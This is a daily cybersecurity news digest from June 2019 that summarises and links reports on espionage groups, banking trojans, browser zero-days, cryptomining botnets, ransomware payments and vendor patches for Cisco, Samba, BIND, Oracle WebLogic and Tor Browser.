Daily NCSC-FI news followup 2019-06-20

Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments

www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments Waterbug may have hijacked a separate espionage groups infrastructure during one attack against a Middle Eastern target.. The Waterbug espionage group (aka Turla) has continued to attack governments and international organizations over the past eighteen months in a series of campaigns that have featured a rapidly evolving toolset and, in one notable instance, the apparent hijacking of another espionage groups infrastructure.

DanaBot Banking Trojan Upgraded with Non Ransomware Module

www.bleepingcomputer.com/news/security/danabot-banking-trojan-upgraded-with-non-ransomware-module/ A new malicious campaign is distributing an upgraded variant of DanaBot that comes with a new ransomware module used to target potential victims from Italy and Poland via phishing emails which deliver malware droppers.. As initially discovered by Proofpoint researchers in May 2018, DanaBot is a modular banking Trojan developed in Delphi and designed to steal banking credentials and sensitive information by collecting form data, taking screenshots, or logging keystrokes on compromised computers.. See also:

research.checkpoint.com/danabot-demands-a-ransom-payment/ and

threatpost.com/danabot-ransomware-arsenal/145863/

Firefox zero-day was used in attack against Coinbase employees, not its users

www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/ There were actually two zero-days — not one — combined into an exploit used in a spear-phishing attempt. Other cryptocurrency organizations were also targeted. A recent Firefox zero-day that has made headlines across the tech news world this week was actually used in attacks against Coinbase employees, and not the company’s users, ZDNet has learned. See also:

www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/,

www.bleepingcomputer.com/news/security/mozilla-firefox-6704-fixes-second-actively-exploited-zero-day/ and

www.bleepingcomputer.com/news/security/firefox-0-day-used-in-targeted-attacks-against-cryptocurrency-firms/

Cryptocurrency Mining Botnet Arrives Through ADB and Spreads Through SSH

blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-botnet-arrives-through-adb-and-spreads-through-ssh/ We observed a new cryptocurrency mining botnet that arrives via open ADB (Android Debug Bridge) ports and can spread via SSH. This attack takes advantage of the way open ADB ports dont have authentication by default, similar to the Satori botnet variant we previously reported. This botnets design allows it to spread from the infected host to any system that has had a previous SSH connection with the host. The use of ADB makes Android-based devices susceptible to the malware. We detected activity from this botnet in 21 different countries, with the highest percentage found in South Korea.

Cisco critical-flaw warning: These two bugs in our data-center gear need patching now

www.zdnet.com/article/cisco-critical-flaw-warning-these-two-bugs-in-our-data-center-gear-need-patching-now/ Cisco is warning enterprise admins to install security updates for two critical flaws. Networking giant Cisco has disclosed two critical vulnerabilities affecting core equipment in the data center that could give determined attackers an avenue to break into networks. Cisco’s Digital Network Architecture (DNA) Center appliance has once again been found to be vulnerable to an authentication bypass, which could allow an “adjacent” attacker to skip authentication and cause damage to an organization’s critical internal services. The flaw, tagged as CVE-2019-1848, is because Cisco didn’t sufficiently restrict access to ports used to operate the system. The vulnerability would allow an attacker to connect an unauthorized device to the network. See also:

tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-dnac-bypass and threatpost.com/cisco-dna-center-critical-flaw/145849/

Google takes the PIS out of advertising: New algo securely analyzes shared encrypted data sets without leaking contents

www.theregister.co.uk/2019/06/19/google_pis_encryption/ Google on Wednesday released source code for a project called Private Join and Compute that allows two parties to analyze and compare shared sets of data without revealing the contents of each set to the other party. This is useful if you want to see how your private encrypted data set of, say, ad-clicks-to-sales conversion rates, correlates to someone else’s encrypted conversion rate data set without disclosing the actual numbers to either side. This particular technique is a type of secure multiparty computation that builds upon a cryptographic protocol called Private Set-Intersection (PSI). Google employs this approach in a Chrome extension called Password Checkup that lets users test logins and passwords against a dataset of compromised credentials without revealing the query to the internet goliath. See also

threatpost.com/google-computational-privacy/145835/ and

www.theregister.co.uk/2019/06/19/google_pis_encryption/

Samba Vulnerability Can Crash Active Directory Components

www.bleepingcomputer.com/news/security/samba-vulnerability-can-crash-active-directory-components/ A couple of bugs in some versions of Samba software can help an attacker crash key processes on the network in charge of accessing directory, application, and server services. The two vulnerabilities can be leveraged separately to crash the LDAP (Lightweight Directory Access Protocol) and the RPC (remote procedural call) server processes in Samba Active Directory Domain Controller, supported since version 4.0 of the software

The U.S. Loses Over $1.5 Trillion in a Decade of Data Breaches

www.bleepingcomputer.com/news/security/the-us-loses-over-15-trillion-in-a-decade-of-data-breaches/ A decade’s collection of data breaches shows a bleak picture with billions of records exposed in this type of incidents and financial damages of more than $1.6 trillion. Data collected from public sources reveal that since 2008 there were close to 9,700 breach events in the U.S., involving more than 10.7 billion records, with an average cost calculated in 2018 at $148 per record.

ISC Releases BIND Security Updates

www.us-cert.gov/ncas/current-activity/2019/06/19/ISC-Releases-BIND-Security-Updates The Internet Systems Consortium (ISC) has released updates that address a vulnerability in versions of ISC Berkeley Internet Name Domain (BIND). A remote attacker could exploit this vulnerability to cause a denial-of-service condition. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the ISC advisory for CVE-2019-6471 and apply the necessary updates.

Check Points Threat Emulation Stops Large-Scale Phishing Campaign in Germany

blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/ During the first week of June 2019, Check Point researchers encountered a new, large-scale phishing campaign targeting German companies across all industries. The hackers goal was to install Remcos a remote control tool on the victims computers. The attackers initially sent fake emails that appeared to be from several legitimate companies across Germany. These emails contained invoices or urgent order attachments which were actually Remcos archives attempting to connect with the attackers command and control (C&C) server. See also

forensics.checkpoint.com/remcos_te/ThreatEmulationReport.html and forensics.checkpoint.com/remcos/index.html

Modular Plurox Malware Is a Wormable Backdoor Cryptominer

www.bleepingcomputer.com/news/security/modular-plurox-malware-is-a-wormable-backdoor-cryptominer/ A new modular backdoor malware strain capable of mining cryptocurrencies and of spreading to other machines on the local network with the help of SMB and UPnP plugins has been detected by Kaspersky security researchers. The backdoor malware named Plurox was discovered in February and it seems to be still in its testing phase given that it’s source code and the communication channels it uses to contact its command-and-control (C&C) server are not yet encrypted in any way. See also:

securelist.com/plurox-modular-backdoor/91213/

Feds: Cyberattack on NASAs JPL Threatened Mission-Control Data

threatpost.com/feds-hackers-mission-control-data-nasa-jpl/145842/ Rampant security-operations bungling allowed cyberattackers to infiltrate JPLs network, which carries human mission data.. NASAs Jet Propulsion Laboratory (JPL) may know how to send delicate equipment to Mars, but basic cybersecurity best practices appear to pose an issue for it. A comprehensive federal review has detailed an April 2018 security incident that compromised mission systems stemming from multiple IT security-control weaknesses exposing NASA systems and data. The review, released Tuesday and carried out by the U.S. Office of the Inspector General, said that the weaknesses reduce JPLs ability to prevent, detect and mitigate attacks targeting its systems and networks.. Specifically, poor practices when it comes to network segmentation and third parties were source of a cyberattack in April 2018, OIG said. See also oig.nasa.gov/docs/IG-19-022.pdf

Cryptominer Uses Cron To Reinfect Linux Host After Removal

www.bleepingcomputer.com/news/security/cryptominer-uses-cron-to-reinfect-linux-host-after-removal/ A cryptomining dropper malware has been spotted by security researchers while gaining persistence on Linux hosts by adding cron jobs to reinfect the compromised machines after being removed. The malware was initially discovered on a web server with a maxed out CPU by a malicious process, a sure sign of a host infected with cryptomining malware configured to use all available computing resources. As Sucuri’s security analyst Luke Leal found after taking a closer look, the cryptominer is downloaded by attackers using a Bash script dropped on the server via an unknown method most probably after exploiting an unpatched vulnerability, brute forcing their way in, or by phishing the admin credentials. See also:

blog.sucuri.net/2019/06/cryptomining-dropper-and-cronjob-creator.html and

www.bleepingcomputer.com/news/security/cryptominer-uses-cron-to-reinfect-linux-host-after-removal/

Oracle issues emergency update to patch actively exploited WebLogic flaw

arstechnica.com/information-technology/2019/06/oracle-issues-emergency-update-to-patch-actively-exploited-weblogic-flaw/ Oracle on Tuesday published an out-of-band update patching a critical code-execution vulnerability in its WebLogic server after researchers warned that the flaw was being actively exploited in the wild. The vulnerability, tracked as CVE-2019-2729, allows an attacker to run malicious code on the WebLogic server without any need for authentication. That capability earned the vulnerability a Common Vulnerability Scoring System score of 9.8 out of 10. The vulnerability is a deserialization attack targeting two Web applications that WebLogic appears to expose to the Internet by defaultwls9_async_response and wls-wsat.war. The flaw in Oracle’s WebLogic Java application servers came to light as a zero-day four days ago when it was reported by security firm KnownSec404. See also:

blog.yoroi.company/warning/nuova-vulnerabilita-in-oracle-weblogic/

Florida city pays $600,000 to ransomware gang to have its data back

www.zdnet.com/article/florida-city-pays-600000-to-ransomware-gang-to-have-its-data-back/ The city council for Riviera Beach, Florida, voted this week to pay more than $600,000 to a ransomware gang so city officials could recover data that has been locked and encrypted more than three weeks ago. See also:

www.tivi.fi/uutiset/tv/33c14270-e69b-4c9b-a8d0-92e8448e8074

Turkulaisen Helin, 42, tulostimesta pullahti yllättäen naapurin lasku Miten kummassa se on mahdollista?

www.is.fi/digitoday/art-2000006148351.html?ref=rss Päivittämättömät tulostimet saattavat päästää sivulliset tulostelemaan vapaasti. Valmistaja sanoo korjailleensa asiaa myöhemmin päivityksillä. Suoratulostussovellus kertoo, minkä nimiseen laitteeseen ollaan tulostamassa. Jos lähekkäin on kaksi samanlaista laitetta, niiden eron huomaa kuitenkin vain tulostimen verkon nimessä olevan laitekohtaisen tunnisteen perusteella. Tämän näkee vain etsimällä sen tulostimen asetuksista.

Tor Browser 8.5.2 Released to Fix Critical Vulnerability

www.bleepingcomputer.com/news/software/tor-browser-852-released-to-fix-critical-vulnerability/ Tor Browser 8.5.2 has been released to fix a critical vulnerability in Firefox that was fixed by Mozilla this week. It is strongly advised that all Tor users install this update as soon as possible. This week, Mozilla released Firefox 67.0.3 to fix a critical vulnerability discovered by Google Project Zero. The fix for this vulnerability has been ported to the bundled Firefox browser in Tor Browser 8.5.2. This JavaScript type confusion vulnerability was discovered being actively used in targeted attacks and thus needed immediate attention. This bug did not affect users running under the Safer or Safest security levels. See also:

www.zdnet.com/article/tor-browser-8-5-2-release-patches-firefox-flaw-being-exploited-in-the-wild/,

threatpost.com/tor-browser-update-critical-flaw/145857/ and

thehackernews.com/2019/06/tor-browser-firefox-hack.html

Russian APT hacked Iranian APT’s infrastructure back in 2017

www.zdnet.com/article/russian-apt-hacked-iranian-apts-infrastructure-back-in-2017/ Turla APT hacked Iran’s APT34 group and used its C&C servers to re-infect APT34 victims with its own malware. As fellow ZDNet writer Andrada Fiscutean once wrote in the fall of 2017: “Spies hack. But the best spies hack other spies.”. That story revolved around a Virus Bulletin 2017 talk detailing several mysterious cases where APTs (advanced persistent threats, a technical term used to describe government-backed hacking units) appeared to had compromised the infrastructure of other APTs, either by accident, or intentionally. While investigating this campaign for its own report, Symantec said it found evidence that sometime in November 2017, the Turla APT (which Symantec calls Waterbug) had hacked into the server infrastructure of an Iranian APT known as APT34 (also known as Oilrig or Crambus). See also:

www.bleepingcomputer.com/news/security/turla-espionage-group-hacks-oilrig-apt-infrastructure/

Linux Cryptominer Uses Virtual Machines to Attack Windows, macOS

www.bleepingcomputer.com/news/security/linux-cryptominer-uses-virtual-machines-to-attack-windows-macos/ A new cryptocurrency mining malware dubbed LoudMiner uses virtualization software to deploy a Linux XMRig coinminer variant on Windows and macOS systems via a Tiny Core Linux virtual machine. The malware comes bundled within cracked copies Windows and macOS VST software such as Propellerhead Reason, Ableton Live, Sylenth1, Nexus, Reaktor, and AutoTune.

Finnairin nimissä leviää huijausviesti älä klikkaa

www.is.fi/digitoday/tietoturva/art-2000006149309.html Finnair kertoo Facebookissa, että yhtiön nimissä leviää tietojenkalasteluviesti Facebookissa ja Instagramissa. Kyseessä on Finnairin julkaisuksi naamioitu mainos, jossa luvataan ilmaisia lentolippuja, mikäli luovuttaa tietonsa julkaisuun linkitetylle verkkosivulle.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.